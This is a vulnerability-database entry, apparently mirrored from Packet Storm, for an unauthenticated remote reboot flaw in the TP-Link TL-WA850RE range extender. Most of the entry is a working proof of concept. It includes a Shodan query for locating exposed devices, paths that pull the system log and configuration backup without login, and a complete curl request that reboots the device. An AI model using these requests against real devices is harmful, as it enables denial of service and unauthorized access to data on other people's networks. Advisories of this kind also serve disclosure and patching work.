ID
VAR-E-201804-0362
TITLE
TP-Link Technologies TL-WA850RE Wi-Fi Range Extender Unauthorized Remote Reboot
Trust: 0.5
DESCRIPTION
TP-Link Technologies TL-WA850RE Wi-Fi Range Extender suffers from an unauthorized remote reboot vulnerability.
Trust: 0.5
AFFECTED PRODUCTS
| vendor: | tp link | model: | tl-wa850re | scope: | - | version: | - | Trust: 0.5 |
EXPLOIT
# Exploit Title: TP-Link Technologies TL-WA850RE Wi-Fi Range Extender | Unauthorized Remote Reboot
# Date: 25/04/2018
# Exploit Author: Wadeek
# Vendor Homepage: https://www.tp-link.com/
# Firmware Link: https://www.tp-link.com/en/download/TL-WA850RE.html
# Category: dos
1. www.shodan.io (with title "Opening...")
"HTTP/1.1 200 OK" "Server: TP-LINK HTTPD/1.0" "COOKIE="
2. Proof of Concept
:System Log:
/data/systemlog.txt?operation=save
:Encrypted Configuration File:
/data/config.bin?operation=backup
:Reboot:
curl --silent 'http://[IP]/data/reboot.json' -H 'Host: [IP]' -H 'Accept: application/json, text/javascript, */*;' --compressed -H 'Content-Type: application/x-www-form-urlencoded; charset=UTF-8' -H 'X-Requested-With: XMLHttpRequest' -H 'Cookie: COOKIE=' -H 'Connection: keep-alive' --data 'operation=write'
Trust: 0.5
EXPLOIT HASH
LOCAL | SOURCE | ||||||||
|
|
Trust: 0.5
PRICE
free
Trust: 0.5
TAGS
| tag: | exploit | Trust: 0.5 |
| tag: | remote | Trust: 0.5 |
CREDITS
Wadeek
Trust: 0.5
EXTERNAL IDS
| db: | PACKETSTORM | id: | 147397 | Trust: 0.5 |
SOURCES
| db: | PACKETSTORM | id: | 147397 |
LAST UPDATE DATE
2022-07-27T09:39:55.726000+00:00
SOURCES RELEASE DATE
| db: | PACKETSTORM | id: | 147397 | date: | 2018-04-27T10:11:11 |